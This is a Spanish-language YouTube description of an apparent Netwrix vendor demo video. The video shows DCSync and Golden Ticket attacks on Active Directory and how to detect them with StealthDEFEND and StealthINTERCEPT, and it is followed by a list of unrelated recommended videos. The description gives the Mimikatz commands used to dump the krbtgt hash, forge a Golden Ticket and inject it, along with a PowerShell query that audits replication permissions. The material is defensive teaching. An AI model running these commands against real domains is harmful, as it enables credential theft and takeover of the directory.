Ataques DCSync y GoldenTicket y detección con StealthDEFEND & StealthINTERCEPT
Los ataques DCSync y Golden Ticket en Microsoft Active Directory pueden permitir a un atacante tomar el control de tu directorio. En este vídeo demostraremos cómo se realizan estos ataques con Mimikatz para que sepas si tu organización es vulnerable a estos ataques. Además, puedes ver cómo detectar, mitigar y responder ante estos ataques tanto con herramientas básicas como con las herramientas avanzadas de Netwrix (StealthDEFEND y StealthINTERCEPT), que están diseñadas para proteger el Active Directory. 0:00 - 0. Introducción 3:10 - 1. Demostración 7:39 - 2. Preparación 9:58 - 3. Protección Básica 16:54 - 4. Protección Avanzada Referencias del vídeo: Vídeo de StealthAUDIT for Active Directory, solución de auditoría y prevención en Active Directory: • [DEMO] StealthAUDIT for Active Directory Vídeo de StealthAUDIT for File Systems, solución de auditoría y prevención en Servidores de Archivos: • [Demo] StealthAUDIT for Files Systems Comandos de PowerShell y Mimikatz utilizados: Cómo obtener el nombre del dominio: (Get-WmiObject -Class Win32_ComputerSystem).Domain Extraer el Hash NTLM de krbtgt: lsadump::dcsync /domain:NombreDelDominio /user:krbtgt Generar el Golden Ticket: kerberos::golden /domain:NombreDelDominio /sid:x-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /rc4:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /id:500 /user:NombreDelUsuarioFicticio Aplicar el Golden Ticket: kerberos::ptt ticket.kirbi Obtener la lista de usuarios con permisos de replicación: (Get-Acl "ad:\dc=DominioDe2oNivel,dc=TopLevelDomain").Access | ? {($_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" ) } | select IdentityReference
![[DEMO] StealthAUDIT for Active Directory](https://i.ytimg.com/vi/_kfCVNun94Y/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFryq4qpAxUIARUAAAAAGAElAADIQj0AgKJDeAE=&rs=AOn4CLCrutgV6WkfL6surWagaIOBUcuRww)
[DEMO] StealthAUDIT for Active Directory

Detecting DCSync and DCShadow Network Traffic

Linux Network Administration (Audio Book)

Webinar: ¿Phishing exitoso? Detenlo antes del desastre con SpyCloud 🛡️🎣

RedHat Talks Vol. 14: Service Mesh

La Ridícula Ingeniería De La Máquina Más Importante Del Mundo
![[Webinar] No más privilegios permanentes con Netwrix Privilege Secure, PAM de Nueva Generación](https://i.ytimg.com/vi/GElZ-gINe8c/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFryq4qpAxUIARUAAAAAGAElAADIQj0AgKJDeAE=&rs=AOn4CLD6-be7jnX8fp4e9Gazjqq-Ob5pIA)
[Webinar] No más privilegios permanentes con Netwrix Privilege Secure, PAM de Nueva Generación

GRUPO 2 | PORTAL CAUTIVO USANDO OPNSENSE Y LDAP

Webinar Continuidad de negocioy DRP con AWS
![[Webinar] Sandboxes - El malware y los ataques de día cero no tienen dónde esconderse con VMRay](https://i.ytimg.com/vi/08YXTppXbR4/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFryq4qpAxUIARUAAAAAGAElAADIQj0AgKJDeAE=&rs=AOn4CLDslIlqwADyihxzTBNjdcKrMoDZKg)
[Webinar] Sandboxes - El malware y los ataques de día cero no tienen dónde esconderse con VMRay

Kerberos Silver Ticket Attack Explained

Crash Course, Active Directory, DHCP & DNS for Entry Level Tech Support

Jeffrey Sachs: Disastrous NATO Summit: Toward Nuclear War with Russia

Instant Focus Mode – 40Hz Gamma Brainwave Music for Deep Focus & Productivity

Ticket Forging Attacks (Golden and Silver)

Webinar: Por qué la YubiKey 5 CCN facilita la autenticación segura en el Sector Público

Deep Dive into LLMs like ChatGPT

Kiuwan Webinar: Crear software seguro y de alta calidad sin gastar de más
![[Webinar] Auditoría de acceso, permisos y amenazas en AD y servidores de archivos](https://i.ytimg.com/vi/Xz7YbLWuTck/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFryq4qpAxUIARUAAAAAGAElAADIQj0AgKJDeAE=&rs=AOn4CLBA7zo-GDjgJ-wYsPlVqwaybmUgeA)
[Webinar] Auditoría de acceso, permisos y amenazas en AD y servidores de archivos

